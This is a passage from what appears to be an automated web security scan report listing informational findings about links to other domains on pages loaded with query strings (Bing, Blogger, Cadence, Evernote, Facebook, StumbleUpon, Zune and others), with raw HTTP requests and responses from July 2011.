<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,80.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=presspass+controls&amp;P3=0&amp;P4=BMME&amp;P5=E66C4FBB1F654227B7791E57B71ACE3C&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dpresspass+controls%26qsc0%3d0%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,82.1')">Tell us what you think</a>
...[SNIP]...

13.6. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search?q=presspass%20controls&FORM=MSSBMN HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:19:45 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Date: Wed, 06 Jul 2011 11:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=E9BAB4C7FF984C72A2A7D8BEAEA22874; domain=.bing.com; path=/
Set-Cookie: MUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=067CC8A94F2C44DCA6EE1FBCBC8D44CF%2c10716aee572d4952b36b2971f6480e26; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=D=1846760&MS=1846760&AF=MSSBMN; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=18047B6C75F646499C286F39250DB552; expires=Fri, 05-Jul-2013 11:20:45 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110706; expires=Fri, 05-Jul-2013 11:20:45 GMT; domain=.bing.com; path=/
Content-Length: 35959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/press/1996/aug96/cntrlpdpr.mspx" onmousedown="return si_T('&amp;ID=SERP,5046.1')">Microsoft Announces Immediate Availability of ActiveX <strong>
...[SNIP]...
<h3><a href="http://www.microsoft.com/presspass/features/2003/dec03/12-17SoxComplianceQA.mspx" onmousedown="return si_T('&amp;ID=SERP,5063.1')">New Microsoft Offering to Help Address Sarbanes-Oxley Compliance ...</a>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/ActiveX_control" onmousedown="return si_T('&amp;ID=SERP,5098.1')">ActiveX - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_controls" onmousedown="return si_T('&amp;ID=SERP,5079.1')">ActiveX <strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#History" onmousedown="return si_T('&amp;ID=SERP,5080.1')">History</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#ActiveX_in_non-IE_applications" onmousedown="return si_T('&amp;ID=SERP,5081.1')">ActiveX in non-IE ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/ActiveX_control#Other_ActiveX_technologies" onmousedown="return si_T('&amp;ID=SERP,5082.1')">Other ActiveX ...</a>
...[SNIP]...
<h3><a href="http://www.obout.com/" onmousedown="return si_T('&amp;ID=SERP,5147.1')">obout - Home</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/201169/" onmousedown="return si_T('&amp;ID=SERP,5165.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.duluthnewstribune.com/event/article/id/168474/" onmousedown="return si_T('&amp;ID=SERP,5183.1')">Duluth News Tribune | Duluth, Minnesota</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/307004/" onmousedown="return si_T('&amp;ID=SERP,5201.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://www.inforum.com/event/article/id/306876/" onmousedown="return si_T('&amp;ID=SERP,5219.1')">INFORUM | Fargo, ND</a>
...[SNIP]...
<h3><a href="http://onlinecredentials.com/PressPass.htm" onmousedown="return si_T('&amp;ID=SERP,5235.1')">OnlineCredentials.com\<strong>
...[SNIP]...
<h3><a href="http://www.dglobe.com/event/article/id/49101/" onmousedown="return si_T('&amp;ID=SERP,5253.1')">Worthington Daily Globe | Worthington, Minnesota</a>
...[SNIP]...
</span><a href="http://go.microsoft.com/?linkid=9771044" class="sn_link" tabindex="0" onmousedown="return si_T('&amp;ID=SERP,5311.1')"><span>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,72.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,74.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,76.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,78.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,80.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=presspass+controls&amp;P3=0&amp;P4=MSSBMN&amp;P5=067CC8A94F2C44DCA6EE1FBCBC8D44CF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dpresspass+controls%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,82.1')">Tell us what you think</a>
...[SNIP]...

13.7. http://www.blogger.com/blog_this.pyra

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogger.com
Path:   /blog_this.pyra

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /blog_this.pyra?t=&u=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&n=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.blogger.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: blogger_TID=1ff906bea4e99427; HttpOnly
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Jul 2011 11:40:29 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=blogger&hl=en&ltmpl=popup&continue=http://www.blogger.com/start?successUrl%3D/blog-this.g?t%2526u%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US%2526n%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US&passive=86400
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?service=blogger&amp;hl=en&amp;ltmpl=popup&amp;continue=http://www.blogger.com/start?successUrl%3D/blog-this.g?t%2526u%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US%2526n%253Dhttp://search.microsoft.com/results.aspx?q%25253Dpresspass%252Bcontrols%252526FORM%25253DMSERRO%252526mkt%25253Den-US&amp;passive=86400">here</A>
...[SNIP]...

13.8. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 140289
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
X-Pingback: http://www.cadence.com/Community/blogs/fv/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Set-Cookie: CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8; expires=Thu, 07-Jul-2011 01:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</a>
           <a href="http://www.chipestimate.com/cadence" target="_blank">IP Catalog</a>
...[SNIP]...
</a>
           <a href="http://www.chipestimate.com/" target="_blank">ChipEstimate.com - Chip Planning Portal</a>
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/ii" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/lp" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/ms" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/sd" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/ip" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/fv" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a> <a href="http://feeds2.feedburner.com/cadence/community/blogs/ld" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/di" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/cic" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/rf" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/pcb" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/pkg" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
</a>&nbsp;<a href="http://feeds2.feedburner.com/cadence/community/blogs/mfg" target="_blank"><span id="Cadence_CS_BlogCat_RSSIcon">
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/newsroom/press_releases">
Cadence Press Releases
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/sd">
System Design and Verification Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/fv">
Functional Verification Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/di">
Digital Implementation Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/cic">
Custom IC Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/rf">
RF Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/pcb">
PCB Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/pkg">
IC Packaging and SiP Design Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs/mfg">
Manufacturability Signoff Blog
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/blogs">
All Blogs
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/22">
System Design and Verification Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/30">
Functional Verification Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/29">
Digital Implementation Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/38">
Custom IC Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/48">
Custom IC SKILL Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/31">
Logic Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/33">
RF Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/27">
PCB Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/28">
PCB SKILL Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/32">
IC Packaging and SiP Design Forum
</a>
...[SNIP]...
<li><a target="_blank" href="http://feeds.feedburner.com/cadence/community/forums/34">
Manufacturability Signoff Forum
</a>
...[SNIP]...
</a> last week announcing that we have donated the UVM World Web site (<a href="http://www.uvmworld.org/">www.uvmworld.org</a>
...[SNIP]...
<p>The third reason that the donation to Accellera is important is that it validates the entire concept of a true EDA community site. The <a href="http://www.uvmworld.org/forums/">forum</a> and <a href="http://www.uvmworld.org/contributions.php">contributions</a>
...[SNIP]...

13.9. http://www.evernote.com/clip.action

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.evernote.com
Path:   /clip.action

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /clip.action?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.evernote.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: shard=deleteme; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cookieTestValue=1309951281866; Version=1; Max-Age=378432000; Expires=Mon, 03-Jul-2023 11:21:21 GMT; Path=/
Set-Cookie: JSESSIONID=533B63D3D80594249497C75E3B0979D4; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 06 Jul 2011 11:21:21 GMT
Connection: close
Server: Evernote/1.0
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
<br />
<a class="icon download" href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=281796108&mt=8">iPhone/iPad/iPod Touch</a><br />
<a class="icon download" href="http://market.android.com/details?id=com.evernote">Android</a><br />
<a class="icon download" href="http://appworld.blackberry.com/webstore/content/1700">BlackBerry</a>
...[SNIP]...

13.10. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.246.30
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:28 GMT
Content-Length: 5867

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/DhINBSBsTFQ.css" />
<script>
...[SNIP]...

13.11. http://www.propeller.com/submit/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.propeller.com
Path:   /submit/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /submit/?U=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&T=presspass controls - Microsoft Search HTTP/1.1
Host: www.propeller.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Jul 2011 11:37:04 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Wed, 06 Jul 2011 12:07:04 GMT
Content-length: 116
Content-type: text/html
Location: http://www.aolnews.com/category/goodbye-propeller/
Connection: close

<html>
<body>
Page relocated <a href="http://www.aolnews.com/category/goodbye-propeller/">here.</a>
</body>
</html>

13.12. http://www.stumbleupon.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /submit?url=https%3a%2f%2fwww.microsoft.com%2fpresspass%2fpresskits%2fDCU%2fdefault.aspx HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48987
Date: Wed, 06 Jul 2011 11:15:24 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta name="description" content="Submit a site to StumbleUpon" />
   
   <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/global_su.css?v=20110701-00" type="text/css" media="screen, projection" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110701-00"></script>

   <link rel="shortcut icon" href="http://cdn.stumble-upon.com/favicon.ico" />

       
           <title>
...[SNIP]...
<noscript>
                   <img src="http://b.scorecardresearch.com/p?c1=2&c2=7677660&cv=2.0&cj=1" />
               </noscript>
...[SNIP]...
<div id="ff-install-helper" style="display: none;">
               <img id="close-button" src="http://cdn.stumble-upon.com/images/close-button.png" alt="x" />
               <h2>Installing is Easy!<img src="http://cdn.stumble-upon.com/images/s.gif" class="iconArrow24" /></h2>
...[SNIP]...
<div style="padding: 35px 0 200px 320px;" class="clearfix">
                   <img src="http://cdn.stumble-upon.com/i/assets/homePromo1.jpg" height="140" width="278" alt="Discover the best videos from YouTube" class="left" style="margin-left: -300px;"/>
                   <h2 style="padding-top: 15px; margin-bottom: 25px; font-size: 20px;">
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110701-00"></script>
...[SNIP]...

13.13. http://zune.net/xweb/lx/js/lxUtil.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /xweb/lx/js/lxUtil.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /xweb/lx/js/lxUtil.js?ver=11032080 HTTP/1.1
Host: zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; lastCulture=en-US

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7200
Content-Length: 203691
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 11:06:54 GMT
Accept-Ranges: bytes
ETag: "01bfb7f152ccc1:3240"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:19:04 GMT

(function(s){var m={"\b":"\\b","\t":"\\t","\n":"\\n","\f":"\\f","\r":"\\r",'"':'\\"',"\\":"\\\\"};s.parseJSON=function(filter){var j;function walk(k,v){var i;if(v&&typeof v==="object"){for(i in v){if(
...[SNIP]...
<param name="initParams" value="'+p+'" />');m.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration:none;display:block;background:#fff;width:500px;height:292px;text-align:center;margin:0 auto;">');m.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style:none;margin-top:39px;"/>
...[SNIP]...
';var d=this.getParams();for(var a in d){b+=[a]+'="'+d[a]+'" '}var c=this.getVariablePairs().join("&");if(c.length>0){b+='flashvars="'+c+'"'}b+="/>"}else{this.addVariable("MMplayerType","ActiveX");b='<object codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,115,0" id="'+this.getAttribute("id")+'" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="'+this.getAttribute("width")+'" height="'+this.getAttribute("height")+'" style="'+this.getAttribute("style")+'">';b+='<param name="movie" value="'+this.getAttribute("swf")+'" />
...[SNIP]...
nitParams" name="initParams" value="autostart=false,muted=False,captions=True,markers=True,isexplicitandischild='+isExplicitAndIsChild+",signinrequired="+signinRequired+",m="+videoPath+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 500px; height: 292px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 39px;"/>
...[SNIP]...
<param name="initParams" name="initParams" value="'+d+'" />');a.push('<a href="http://go.microsoft.com/fwlink/?LinkID=149156&v=3.0.40624.0" style="text-decoration: none; display: block; background: #fff; width: 660px; height: 400px; text-align: center;">');a.push('<img src="http://social.'+ZunePageData.BaseDomain+'/xweb/lx/pic/video_silverlight.png" alt="Get Microsoft Silverlight" style="border-style: none; margin-top: 93px;"/>
...[SNIP]...
<br/>'+LocStr.lxUtilResources.PodcastReportAConcernFooterText+'<a target="_blank" href="http://www.microsoft.com/info/cpyrtinfrg.htm">http://www.microsoft.com/info/cpyrtinfrg.htm</a>
...[SNIP]...

14. Cross-domain script include
There are 51 instances of this issue:

Issue background

